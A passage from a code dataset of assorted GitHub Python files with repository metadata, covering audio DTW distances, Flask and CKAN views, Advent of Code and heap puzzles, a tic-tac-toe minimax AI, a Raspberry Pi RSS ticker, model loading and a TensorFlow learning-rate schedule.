8))\n","repo_name":"aminuolawale/algo_prep","sub_path":"graph_theory/12.0.min_spanning_tree.py","file_name":"12.0.min_spanning_tree.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37402695430","text":"import librosa.sequence\nimport numpy as np\n\n\n# calculate multidimensional dtw distance(suppose independent)\n# parameter ; np.array (output of function 'extract_features' in lpc.py)\n# return ; dtw distance of each order, np.array\ndef calculate_dtw_distance(file1_co, file2_co):\n input_dtw_distance = np.zeros(file1_co.shape[1])\n for i in range(file1_co.shape[1]):\n # align feature sequence with dtw\n input_dtw, input_wp = librosa.sequence.dtw(file1_co[:, i], file2_co[:, i])\n\n # calculate distance\n input_path = np.zeros(len(input_wp[:, 0]))\n for j in range(len(input_wp[:, 0])):\n input_path[j] = input_dtw[input_wp[j, 0], input_wp[j, 1]]\n\n # store result of this order\n input_dtw_distance[i] = (input_path.sum() / len(input_path))\n\n return input_dtw_distance\n","repo_name":"veryneuron/genderrecognition","sub_path":"dtw.py","file_name":"dtw.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7844846214","text":"from collections.abc import MutableMapping\n'''\nUntil Python3.5 the dict returns keys and values in random order -\nnot he order how the dict was filled.\n\n'''\npets_names = {\n 'cat': 'Ksy Ksy',\n 'dog': 'JSON'\n}\n\nprint(pets_names)\n\n'''\nDisplay keys of object\n'''\n\n\nclass MyClass:\n def __init__(self):\n self.dog = 'JSON'\n self.cat = 'Ksy Ksy'\n\n\npets = MyClass()\nfor key, value in pets.__dict__.items():\n print(f\"{key} = {value}\")\n\n\n'''\nWorking with objects which looks like dicts\nex: module Collections.abc\n'''\n\nvotes = {\n 'pet1': 1281,\n 'pet2': 587,\n 'pet3': 863\n}\n\n\ndef populate_ranks(votes, ranks):\n names = list(votes.keys())\n names.sort(key=votes.get, reverse=True)\n for i, name in enumerate(names, 1):\n ranks[name] = i\n\n\ndef get_winner(ranks):\n return next(iter(ranks))\n\n\nranks = {}\n\npopulate_ranks(votes, ranks)\nprint(ranks)\n\nwinner = get_winner(ranks)\nprint(winner)\n\n'''\nCustom class to implement object with behaviour like dict\n'''\nclass SortedDict(MutableMapping):\n def __init__(self):\n self.data = {}\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __setitem__(self, key, value):\n self.data[key] = value\n\n def __delitem__(self, key):\n del self.data[key]\n\n def __iter__(self):\n keys = list(self.data.keys())\n keys.sort()\n for key in keys:\n yield key\n\n def __len__(self):\n return len(self.data)\n\n\nsorted_ranks = SortedDict()\n\npopulate_ranks(votes, sorted_ranks)\nprint(sorted_ranks.data)\n\nwinner = get_winner(sorted_ranks)\nprint(winner)\n\n'''\n- Not write code to believe on ordering of put values\n- Add type hinting to dict\n- Check is these parameters are dicts and not similar classes\n'''\n#78","repo_name":"MarcinGladkowski/python","sub_path":"dict/dict_ordering.py","file_name":"dict_ordering.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4980410475","text":"from __future__ import absolute_import\n\nfrom flask import abort, Blueprint, current_app, flash, jsonify, \\\n render_template, request, redirect, url_for, make_response\nfrom flask_breadcrumbs import register_breadcrumb\nfrom flask_menu import register_menu\n\nfrom invenio.base.i18n import _\nfrom invenio.base.globals import cfg\nfrom invenio.ext.sslify import ssl_required\nfrom invenio.base.decorators import wash_arguments\nfrom invenio.ext.sqlalchemy import db\nfrom invenio.modules.formatter import format_record\n\nfrom lw_daap.ext.login import login_required\nfrom .service_utils import createInstrument, getFilteredInstrumentsByIdUser, addPermissionGroup, findInstrumentByName, \\\n getPaginatedInstrumentsByIdUser, getCountInstrumentsByIdUser, getDBPublicUser, getDBPublicPass, getDBUrl\n\nfrom lw_daap.modules.profile.service_utils import getUserInfoByPortalUser\nfrom lw_daap.modules.profile.models import UserProfile\n\nfrom flask_login import current_user\nimport urllib2, json\n\nfrom lw_daap.modules.instruments.models import Instrument\nfrom lw_daap.modules.instruments.forms import SearchForm, InstrumentForm\nfrom lw_daap.modules.instruments.pagination import Pagination\n\nfrom werkzeug import MultiDict\nfrom array import *\n\nblueprint = Blueprint(\n 'lwdaap_instruments',\n __name__,\n url_prefix=\"/instruments\",\n static_folder=\"static\",\n template_folder=\"templates\",\n)\n@blueprint.route('/', methods=['GET', ])\n@register_menu(blueprint, 'main.instruments', _('Instruments'), order=3)\n@register_breadcrumb(blueprint, '.', _('Instruments'))\n@wash_arguments({'p': (unicode, ''),\n 'so': (unicode, ''),\n 'page': (int, 1),\n })\ndef index(p, so, page):\n page = max(page, 1)\n per_page = cfg.get('INSTRUMENTS_DISPLAYED_PER_PAGE', 9)\n\n instruments = getPaginatedInstrumentsByIdUser(current_user['id'],p, page, per_page)\n count = getCountInstrumentsByIdUser(current_user['id'],p)\n instruments_json = json.loads(instruments)\n\n form = SearchForm()\n\n my_array = [None] * 0\n for instrument in instruments_json:\n i = Instrument.from_json(instrument)\n my_array.append(i)\n\n pagination = Pagination(page, per_page, count)\n\n ctx = dict(\n instruments=my_array,\n form=form,\n page=page,\n per_page=per_page,\n pagination = pagination,\n )\n\n return render_template(\n \"instruments/index.html\",\n **ctx\n )\n\n@blueprint.route('/new/', methods=['GET', 'POST'])\n@ssl_required\n@login_required\n@register_breadcrumb(blueprint, '.new', _('Create new'))\ndef new():\n uid = current_user.get_id()\n form = InstrumentForm(request.values, crsf_enabled=False)\n\n ctx = {\n 'form': form,\n 'is_new': True,\n 'instruments': None,\n }\n\n if request.method == 'POST' and form.validate():\n data = form.data\n\n # Extract access_groups from Instrument data\n access_groups = data['access_groups']\n del data['access_groups']\n\n # Depends on the access right selected, clean some instrument fields\n i = Instrument(user_id=uid, **data)\n if i.access_right == \"open\":\n i.access_conditions = \"\"\n i.embargo_date = \"\"\n elif i.access_right == \"embargoed\":\n i.access_conditions = \"\"\n elif i.access_right == \"restricted\":\n i.embargo_date = \"\"\n i.license = \"\"\n else:\n i.access_conditions = \"\"\n i.embargo_date = \"\"\n i.license = \"\"\n\n db.session.commit()\n\n # Check if logged user has configured the profile BD fields\n userInfo = getUserInfoByPortalUser(current_user['nickname'])\n userInfoJson = json.loads(userInfo)\n if userInfoJson['databaseUser']:\n # If already exists an instrument with the chosen name: show an error message\n # Else: Save instrument data\n try:\n instrumentWithSameName = findInstrumentByName(i.name)\n flash(\"Already exists an instrument with the same name. Please choose another name.\", category='error')\n except Exception as e:\n instrument = createInstrument(i.name, i.embargo_date, i.access_right, i.user_id, i.license, i.access_conditions, userInfoJson['databaseUser'], current_user['nickname'])\n jsonInstrument = json.loads(instrument)\n if (jsonInstrument['idInstrument']) >= 0:\n i.id = int(jsonInstrument['idInstrument'])\n if i.access_right == 'restricted':\n for group in access_groups:\n try:\n addPermissionGroup(i.name, group['identifier'])\n except Exception as e:\n flash(\"There was an error. Please, contact with the Lifewatch site administrator.\", category='error')\n flash(\"Instrument was successfully created.\", category='success')\n return redirect(url_for('.show', instrument_id=i.id))\n else:\n flash(\"There was an error. Please, contact with the Lifewatch site administrator.\", category='error')\n else:\n flash(\"The database user doesn't exist. Please update your profile before registering an instrument.\", category='error')\n\n\n return render_template(\"instruments/new.html\", **ctx)\n\n\n@blueprint.route('//show/', methods=['GET', 'POST'])\n@register_breadcrumb(blueprint, '.show', 'Show')\n@wash_arguments({'page': (int, 1)})\ndef show(instrument_id, page):\n instrument = Instrument.query.get_or_404(instrument_id)\n\n dbuser = getDBPublicUser(instrument_id)\n dbpass = getDBPublicPass(instrument_id)\n tablename = \"INST_CONTENT_\" + instrument.name\n db_url = getDBUrl()\n\n tabs = {\n 'public': {\n 'template': 'instruments/show.html',\n 'q': {'public': True},\n }\n }\n\n try:\n tab_info = tabs['public']\n except KeyError:\n abort(404)\n query_opts = tab_info.get('q', {})\n records = instrument.get_instrument_records(**query_opts)\n page = max(page, 1)\n per_page = cfg.get('RECORDS_IN_INSTRUMENTS_DISPLAYED_PER_PAGE', 5)\n records = records.paginate(page, per_page=per_page)\n\n template = tab_info.get('template')\n\n ctx = dict(\n instrument=instrument,\n records=records,\n tablename=tablename.upper(),\n dbuser=dbuser,\n dbpass=dbpass,\n dburl=db_url,\n format_record=format_record,\n page=page,\n per_page=per_page,\n )\n\n return render_template(template, **ctx)\n\n@blueprint.route('/save/', methods=['POST', 'GET'])\n@login_required\ndef save():\n is_submit = request.args.get('submit') == '1'\n is_complete_form = request.args.get('all') == '1'\n\n\n if request.method != 'POST':\n abort(400)\n\n data = request.json or MultiDict({})\n\n if 'access_groups' in data:\n del data['access_groups']\n uid = current_user.get_id()\n\n instrument = Instrument(user_id=uid, **data)\n dummy_form, validated, result = instrument.process(\n data, complete_form=is_complete_form or is_submit\n )\n\n # if validated and is_submit:\n # instrument.complete()\n\n try:\n return jsonify(result)\n except TypeError:\n return jsonify(None)\n\n\n\n@blueprint.route(\n '/save//',\n methods=['GET', 'POST'])\n@login_required\ndef autocomplete(field_name=None):\n \"\"\"Auto-complete a form field.\"\"\"\n term = request.args.get('term') # value\n limit = request.args.get('limit', 50, type=int)\n\n form = InstrumentForm(request.values, crsf_enabled=False)\n result = form.autocomplete(field_name, term, limit=limit)\n result = result if result is not None else []\n\n # jsonify doesn't return lists as top-level items.\n resp = make_response(\n json.dumps(result, indent=None if request.is_xhr else 2)\n )\n resp.mimetype = \"application/json\"\n return resp\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/modules/instruments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19686148204","text":"coordinate_area_size = dict()\narea_map = dict()\narea_key = dict()\nmax_x = 0\nmax_y = 0\nmin_x = 9999\nmin_y = 9999\n\n\ndef get_manhattan_distance(coord1, coord2):\n return abs(coord1[0] - coord2[0]) + abs(coord1[1] - coord2[1])\n\n\ndef get_closest(this_x, this_y):\n # print(\"checking neighbors for {}, {}\", this_x, this_y)\n if (this_x, this_y) in coordinate_area_size:\n # print(\"found\")\n return this_x, this_y\n step = 1\n while True:\n found_in_this_step = list()\n current_x, current_y = this_x, this_y + step\n # move to left\n while current_y > this_y:\n # print(\"checking {}, {}\".format(x,y))\n if (current_x, current_y) in coordinate_area_size:\n found_in_this_step.append((current_x, current_y))\n current_x -= 1\n current_y -= 1\n while current_x < this_x:\n # print(\"checking {}, {}\".format(x,y))\n if (current_x, current_y) in coordinate_area_size:\n found_in_this_step.append((current_x, current_y))\n current_x += 1\n current_y -= 1\n while current_y < this_y:\n # print(\"checking {}, {}\".format(x,y))\n if (current_x, current_y) in coordinate_area_size:\n found_in_this_step.append((current_x, current_y))\n current_x += 1\n current_y += 1\n while current_x > this_x:\n # print(\"checking {}, {}\".format(x,y))\n if (current_x, current_y) in coordinate_area_size:\n found_in_this_step.append((current_x, current_y))\n current_x -= 1\n current_y += 1\n\n if len(found_in_this_step) == 1:\n return found_in_this_step[0]\n if len(found_in_this_step) > 1:\n return None\n step += 1\n\n\nwith open(\"input1.txt\") as file:\n for i, row in enumerate(file):\n x = int(row.split(\",\")[0].strip())\n y = int(row.split(\",\")[1].strip())\n if x > max_x:\n max_x = x\n if y > max_y:\n max_y = y\n if x < min_x:\n min_x = x\n if y < min_y:\n min_y = y\n coordinate_area_size[(x, y)] = 0\n\n# part 1\nfor x in range(min_x, max_x):\n for y in range(min_y, max_y):\n closest = get_closest(x, y)\n if closest is not None:\n coordinate_area_size[closest] += 1\n\n# for the simplest approximation, just check that these areas don't extend past 100 in any direction\ncleaned_areas = dict()\nfor key, value in coordinate_area_size.items():\n if get_closest(key[0]+100, key[1]) != key and get_closest(key[0]-100, key[1]) != key and get_closest(key[0], key[1]+100 != key) and get_closest(key[0], key[1]-100 != key):\n cleaned_areas[key] = value\n\nprint(cleaned_areas[max(cleaned_areas, key=cleaned_areas.get)])\n\n\n# part 2\n\nacceptable_locations = 0\n\nfor x in range(min_x, max_x):\n for y in range(min_y, max_y):\n total_distance = 0\n for coordinate in coordinate_area_size.keys():\n total_distance += get_manhattan_distance((x, y), coordinate)\n if total_distance >= 10000:\n break\n if total_distance < 10000:\n acceptable_locations += 1\n\nprint(acceptable_locations)\n","repo_name":"mkolas/advent2018","sub_path":"06/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5282155846","text":"import glog as log\nimport os.path as osp\nimport h5py\nimport numpy as np\nimport torch\nimport models.cifar\nimport models.imagenet\n\n\ndef load_weight_from_pth_checkpoint(model, fname):\n log.info('Load weights from {}'.format(fname))\n raw_state_dict = torch.load(fname, map_location='cpu')['state_dict']\n state_dict = dict()\n for key, val in raw_state_dict.items():\n new_key = key.replace('module.', '')\n state_dict[new_key] = val\n\n model.load_state_dict(state_dict)\n\n\ndef make_model(dataset, arch, **kwargs):\n \"\"\"\n Make model, and load pre-trained weights.\n :param dataset: cifar10 or imagenet\n :param arch: arch name, e.g., alexnet_bn\n :return: model (in cpu and training mode)\n \"\"\"\n assert dataset in ['cifar10', 'imagenet']\n if dataset == 'cifar10':\n if arch == 'gdas':\n assert kwargs['train_data'] == 'full'\n model = models.cifar.gdas('data/cifar10-models/gdas/seed-6293/checkpoint-cifar10-model.pth')\n model.mean = [125.3 / 255, 123.0 / 255, 113.9 / 255]\n model.std = [63.0 / 255, 62.1 / 255, 66.7 / 255]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n elif arch == 'pyramidnet272':\n assert kwargs['train_data'] == 'full'\n model = models.cifar.pyramidnet272(num_classes=10)\n load_weight_from_pth_checkpoint(model, 'data/cifar10-models/pyramidnet272/checkpoint.pth')\n model.mean = [0.49139968, 0.48215841, 0.44653091]\n model.std = [0.24703223, 0.24348513, 0.26158784]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n else:\n # decide weight filename prefix, suffix\n if kwargs['train_data'] in ['cifar10.1']:\n # use cifar10.1 (2,000 images) to train models\n if kwargs['train_data'] == 'cifar10.1':\n prefix = 'data/cifar10.1-models'\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n if kwargs['epoch'] == 'final':\n suffix = 'final.pth'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n elif kwargs['train_data'] == 'full':\n # use full training set to train models\n prefix = 'data/cifar10-models'\n if kwargs['epoch'] == 'final':\n suffix = 'checkpoint.pth.tar'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth.tar'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n\n if arch == 'alexnet_bn':\n model = models.cifar.alexnet_bn(num_classes=10)\n elif arch == 'vgg11_bn':\n model = models.cifar.vgg11_bn(num_classes=10)\n elif arch == 'vgg13_bn':\n model = models.cifar.vgg13_bn(num_classes=10)\n elif arch == 'vgg16_bn':\n model = models.cifar.vgg16_bn(num_classes=10)\n elif arch == 'vgg19_bn':\n model = models.cifar.vgg19_bn(num_classes=10)\n elif arch == 'wrn-28-10-drop':\n model = models.cifar.wrn(depth=28, widen_factor=10, dropRate=0.3, num_classes=10)\n else:\n raise NotImplementedError('Unknown arch {}'.format(arch))\n\n # load weight\n load_weight_from_pth_checkpoint(model, osp.join(prefix, arch, suffix))\n\n # assign meta info\n model.mean = [0.4914, 0.4822, 0.4465]\n model.std = [0.2023, 0.1994, 0.2010]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n\n elif dataset == 'imagenet':\n\n model = eval('models.imagenet.{}(num_classes=1000, pretrained=\\'imagenet\\')'.format(arch))\n\n if kwargs['train_data'] == 'full':\n # torchvision has load correct checkpoint automatically\n pass\n elif kwargs['train_data'] == 'imagenetv2-val':\n prefix = 'data/imagenetv2-v1val45000-models'\n if kwargs['epoch'] == 'final':\n suffix = 'checkpoint.pth.tar'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth.tar'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n\n # load weight\n load_weight_from_pth_checkpoint(model, osp.join(prefix, arch, suffix))\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n else:\n raise NotImplementedError('Unknown dataset {}'.format(dataset))\n\n return model\n","repo_name":"ZiangYan/subspace-attack.pytorch","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"33519373682","text":"\"\"\"\nFunctions and other code belonging to the solo dame mode\n\"\"\"\nimport random\n\n# AI difficult mode\ndef ai_mode(table, players_avatar):\n global scores\n player1 = players_avatar[0]\n player2 = players_avatar[1]\n bestScore = float('-inf') # negative infinity\n move = []\n for l in range(3):\n for c in range(3):\n # Is the spot available?\n if (table[l][c] == 0):\n table[l][c] = player2\n score = minimax(table, players_avatar, 0, False)\n #score = 1\n table[l][c] = 0\n if score > bestScore:\n bestScore = score\n move = [l, c]\n\n return move\n\n# x, o , tie\nglobal scores\n#scores = {'x': -1, 'o': 1, 'tie': 0}\n\ndef set_scores(players_avatar):\n global scores\n scores = {players_avatar[0]: -1, players_avatar[1]: 1, 'tie': 0}\n\n# Minimax AI function, to cycle all posibillities\ndef minimax(table, players_avatar, depth, isMaximizing):\n result = ai_winner(table)\n global scores\n\n if result != None:\n return scores[result]\n\n player1 = players_avatar[0]\n player2 = players_avatar[1]\n\n if isMaximizing:\n bestScore = float('-inf') # negative infinity\n for l in range(3):\n for c in range(3):\n # Is the spot available?\n if table[l][c] == 0:\n table[l][c] = player2 # AI\n score = minimax(table, players_avatar, depth + 1, False) # call minimax recusively\n table[l][c] = 0\n bestScore = max(score, bestScore) # find the best spot\n\n return bestScore # return the best spot\n else:\n bestScore = float('inf') # negative infinity\n for l in range(3):\n for c in range(3):\n # Is the spot available?\n if table[l][c] == 0:\n table[l][c] = player1\n score = minimax(table, players_avatar, depth + 1, True) # call minimax recusively\n table[l][c] = 0\n bestScore = min(score, bestScore) # find the best spot\n\n return bestScore # return the best spot\n\ndef ai_winner(table):\n winner = None\n global scores\n\n # horizontal\n for l in range(3):\n if (table[l][0] == table[l][1] == table[l][2]) and table[l][0] != 0:\n winner = table[l][0]\n\n # Vertical\n for c in range(3):\n if (table[0][c] == table[1][c] == table[2][c]) and table[0][c] != 0:\n winner = table[0][c]\n\n # Diagonal\n if (table[0][0] == table[1][1] == table[2][2]) and table[0][0] != 0:\n winner = table[0][0]\n \n if (table[2][0] == table[1][1] == table[0][2]) and table[2][0] != 0:\n winner = table[2][0]\n\n openSpots = 0\n for l in range(3):\n for c in range(3):\n if (table[l][c] == 0):\n openSpots += 1\n \n if (winner == None and openSpots == 0):\n return 'tie'\n else:\n return winner\n\n# AI easy mode\n# Chooses random values and checks if the spots are not taken,\n# if they are, it will recursively try to find a free spot\ndef easy_mode(table):\n if not free_spaces: return None # garantee that there are free spots, \n # in order to not have a infinite loop\n pos_x = random.randint(0,2) # 0 to 2\n pos_y = random.randint(0,2) # 0 to 2\n\n # print(f\"easy_pos: {pos_x}-{pos_y}\") DEBUG\n\n if table[pos_x][pos_y] == 0:\n return [pos_x, pos_y]\n return easy_mode(table) # recursive call\n\n# check for free spaces on the table\ndef free_spaces(table):\n for line in table:\n for column in line:\n if table[line][column] == 0: return True\n return False\n","repo_name":"TheGoncaloSilva/tic_tac_toe_app_improved","sub_path":"src/pages/solo.py","file_name":"solo.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11637046722","text":"#!/usr/bin/python\n\"\"\"\nRSSFeed-Multi.py\nAuthor : Martin Coleman with major contributions by Raspberry Pi forum user ghp\nCreation Date : 03/03/2022\n\nFree and open for all to use. But put credit where credit is due.\n\nUse the rocker switch to flip between feeds, button 4 (the one on it's own) will shutdown.\n\nIn this version the RSS feeds are read in from /boot/rss-feeds.txt , this enables feeds to\nbe added and removed on a Windoze machine \n\nOVERVIEW:-----------------------------------------------------------------------\nObtian data from an RSS feeds and display it on an LCD\n\"\"\"\n\nimport pifacecad\ntry:\n from lcdScroll import Scroller\nexcept ImportError:\n print (\"Please ensure lcdScroll.py is in the current directory\")\ntry: \n import feedparser\nexcept ImportError:\n print (\"The feedparser module is missing! Please run; sudo pip install feedparser and try again.\") \nimport sys\nimport threading\nimport time\nimport copy\nimport os\nimport ast\n\nwith open(\"/boot/rss-feeds.txt\", \"r\") as data:\n RSS_FEEDS = ast.literal_eval(data.read())\n\nclass RSSFeed(object):\n def __init__(self, feed_name, feed_url):\n self.feed_name = feed_name\n self.feed_url = feed_url\n\nclass FeedViewer:\n def __init__(self, cad):\n self.cad = cad\n self.cad.lcd.backlight_on()\n self.cad.lcd.blink_off()\n self.cad.lcd.cursor_off()\n\n def start(self, feed):\n self.current_feed = feed\n\n self.run = True\n self.stopped_event = threading.Event()\n\n self.thread_update = threading.Thread(target=self._update, name=\"update\")\n self.thread_update.start()\n\n def stop(self):\n self.run = False\n self.stopped_event.wait()\n self.stopped_event.clear()\n\n def terminate(self):\n cad.lcd.blink_off()\n cad.lcd.cursor_off()\n cad.lcd.backlight_off()\n cad.lcd.clear()\n\n def _update(self):\n \"\"\" running in a thread; rolling feeds to lcd\"\"\"\n speed_time = 0.01 # How fast to scroll the lcd\n current_position = 0\n rawfeed=feedparser.parse(self.current_feed.feed_url)\n self.cad.lcd.clear()\n\n while self.run:\n try:\n feed = rawfeed['entries'][current_position]['title']\n except Exception:\n # most possibly end of feed arrived\n current_position = 0\n continue\n\n title = self.current_feed.feed_name\n lines = [title,feed]\n\n # Create our scroller instance:\n scroller = Scroller(lines=lines)\n t_end = time.time() + 60 # How long to scroll each entry of the feed, in seconds.\n while time.time() < t_end:\n if not self.run: break\n #Get the updated scrolled lines, and display:\n message = scroller.scroll()\n self.cad.lcd.write(message)\n\n self._sleep(speed_time)\n\n current_position += 1\n self.stopped_event.set()\n\n def _sleep(self, t):\n \"\"\"a stoppable time.sleep()\"\"\"\n t_end = time.time() + t\n\n while time.time() < t_end:\n if not self.run: break\n time.sleep(0.05)\n\n# listener cannot deactivate itself so we have to wait until it has\n# finished using a threading.Barrier.\n# global end_barrier\nend_barrier = threading.Barrier(2)\n\nclass RSSController(object):\n def __init__(self, cad, feeds, feed_index=0):\n self.feeds = feeds\n self.feed_index = feed_index\n self.lock = threading.Lock()\n\n with self.lock:\n self.viewer = FeedViewer(cad)\n current_feed = copy.copy( self.feeds[self.feed_index] )\n self.viewer.start( current_feed)\n\n def next_feed(self, event=None):\n with self.lock:\n self.feed_index = (self.feed_index + 1) % len(self.feeds)\n self.viewer.stop()\n current_feed = copy.copy( self.feeds[self.feed_index] )\n self.viewer.start( current_feed)\n\n\n def previous_feed(self, event=None):\n with self.lock:\n self.feed_index = (self.feed_index - 1) % len(self.feeds)\n self.viewer.stop()\n current_feed = copy.copy( self.feeds[self.feed_index] )\n self.viewer.start( current_feed)\n\n def stop(self):\n with self.lock:\n self.viewer.stop()\n self.viewer.terminate()\n\n\nif __name__ == \"__main__\":\n\n feeds = \\\n [RSSFeed(s['feed_name'], s['url']) for s in RSS_FEEDS]\n\n cad = pifacecad.PiFaceCAD()\n\n # global rssdisplay\n rssdisplay = RSSController(cad, feeds)\n\n # wait for button presses\n switchlistener = pifacecad.SwitchEventListener(chip=cad)\n switchlistener.register(4, pifacecad.IODIR_ON, end_barrier.wait)\n switchlistener.register(6, pifacecad.IODIR_ON, rssdisplay.previous_feed)\n switchlistener.register(7, pifacecad.IODIR_ON, rssdisplay.next_feed)\n switchlistener.activate()\n\n end_barrier.wait() # wait unitl exit\n switchlistener.deactivate()\n rssdisplay.stop()\n cad.lcd.write(\"Shutdown In 5\")\n time.sleep(5)\n cad.lcd.clear()\n os.system(\"sudo shutdown -h now\")\n #sys.exit() # Uncomment this and comment the above to exit rather than shutdown.\n \n \n","repo_name":"Trotter73/RSS-Ticker","sub_path":"RSSFeed-Multi-Ext.py","file_name":"RSSFeed-Multi-Ext.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10170579962","text":"from typing import Any, Dict\n\nimport tensorflow as tf\n\nfrom tensorflow_similarity.types import FloatTensor\n\n\n@tf.keras.utils.register_keras_serializable(package=\"Similarity\")\nclass WarmUpCosine(tf.keras.optimizers.schedules.LearningRateSchedule):\n \"\"\"A LearningRateSchedule that uses a cosine decay schedule with a warmup period.\n\n This learning rate schedule is useful for training when using the Barlow Twin Loss.\n\n The warmup period applies a linear scaling to the CosineDecay schedule.\n \"\"\"\n\n def __init__(\n self,\n initial_learning_rate: float,\n decay_steps: int,\n warmup_steps: int,\n warmup_learning_rate: float = 0.0,\n alpha: float = 0.0,\n name: str = \"WarmUpCosine\",\n ):\n \"\"\"Applies cosine decay to the learning rate.\n\n Args:\n initial_learning_rate: A scalar `float32` or `float64` Tensor or a\n Python number. The initial learning rate.\n decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.\n Number of steps to decay over.\n warmup_steps: A scalar `int32` or `int64` `Tensor` or a Python number.\n Number of steps to warmup over. Must be smaller than the number of\n decay_steps.\n warmup_learning_rate: A scalar `float32` or `float64` Tensor or a\n Python number. The initial warmup learning rate. Must be smaller than\n the initial_learning_rate. Defaults to 0.0.\n alpha: A scalar `float32` or `float64` Tensor or a Python number.\n Minimum learning rate value as a fraction of initial_learning_rate.\n Defaults to 0.0.\n name: String. Optional name of the operation. Defaults to 'WarmUpCosine'.\n \"\"\"\n\n super().__init__()\n\n if warmup_learning_rate > initial_learning_rate:\n raise ValueError(\n \"warmup_learning_rate must be smaller than the initial_learning_rate\"\n )\n\n if warmup_steps > decay_steps:\n raise ValueError(\n \"warmup_steps must be smaller than the decay_steps\"\n )\n self.initial_learning_rate = initial_learning_rate\n self.decay_steps = decay_steps\n self.alpha = alpha\n self.warmup_learning_rate = warmup_learning_rate\n self.warmup_steps = warmup_steps\n self.name = name\n\n self.cosine_decay = tf.keras.optimizers.schedules.CosineDecay(\n initial_learning_rate=initial_learning_rate,\n decay_steps=decay_steps,\n alpha=alpha,\n )\n # Compute the warmup increment.\n self.tf_initial_learning_rate = tf.convert_to_tensor(\n self.initial_learning_rate, name=\"initial_learning_rate\"\n )\n self.dtype = self.tf_initial_learning_rate.dtype\n self.learning_rate_delta = tf.convert_to_tensor(\n self.warmup_learning_rate / self.initial_learning_rate, self.dtype\n )\n self.warmup_inc = tf.math.divide_no_nan(\n (1.0 - self.learning_rate_delta),\n tf.convert_to_tensor(self.warmup_steps, self.dtype),\n )\n\n # If the warmup increment is zero we have no warm up phase and we set\n # the learning rate delta to 1.0 to ensure the warmup_scaler value is\n # always fixed at 1.0.\n if self.warmup_inc == 0:\n self.learning_rate_delta = tf.constant([1.0], self.dtype)\n\n def __call__(self, step: FloatTensor) -> FloatTensor:\n global_step_recomp = tf.cast(step, self.dtype)\n warmup_scaler = tf.minimum(\n 1.0, self.warmup_inc * global_step_recomp + self.learning_rate_delta\n )\n learning_rate: FloatTensor = (\n self.cosine_decay(global_step_recomp) * warmup_scaler\n )\n return learning_rate\n\n def get_config(self) -> Dict[str, Any]:\n return {\n \"initial_learning_rate\": self.initial_learning_rate,\n \"decay_steps\": self.decay_steps,\n \"alpha\": self.alpha,\n \"warmup_learning_rate\": self.warmup_learning_rate,\n \"warmup_steps\": self.warmup_steps,\n \"name\": self.name,\n }\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"similarity-master/tensorflow_similarity/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"32159075734","text":"from heapq import heappop, heappush\r\nimport sys\r\ninput = sys.stdin.readline\r\nn = int(input())\r\narr = []\r\nfor i in range(n):\r\n heappush(arr, int(input()))\r\nnew_arr = []\r\nanswer = 0\r\nif n == 1:\r\n print(0)\r\nelse:\r\n while arr:\r\n if len(arr) > 1:\r\n num = heappop(arr) + heappop(arr)\r\n answer += num\r\n heappush(arr, num)\r\n else:\r\n break\r\n print(answer)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1715. 카드 정렬하기/카드 정렬하기.py","file_name":"카드 정렬하기.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74044671271","text":"import json\nimport logging\nimport typing\nfrom functools import partial\nimport ckan.lib.navl.dictization_functions as dict_fns\nimport ckan.lib.helpers as h\nimport ckan.model\nfrom flask import Blueprint, redirect, request\nfrom flask.views import MethodView\nfrom ckan.views.home import CACHE_PARAMETERS\nfrom ckan.views.dataset import url_with_params\nfrom ckan.plugins import toolkit\nfrom ckan.logic import clean_dict, parse_params, tuplize_dict\n\nfrom ..helpers import get_status_labels\n\nlogger = logging.getLogger(__name__)\n\nerror_report_blueprint = Blueprint(\n \"error_report\", __name__, template_folder=\"templates\", 